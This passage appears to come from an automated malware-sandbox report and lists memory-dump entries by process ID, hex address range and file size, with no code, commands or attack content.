                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/4420-198-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/4776-241-0x0000000000EE0000-0x0000000000EF2000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        72KB

                                                                                                                                                                      • memory/4924-185-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/5048-236-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/5056-140-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/5056-143-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/5060-207-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/5320-251-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/5540-249-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/6208-243-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/7064-254-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB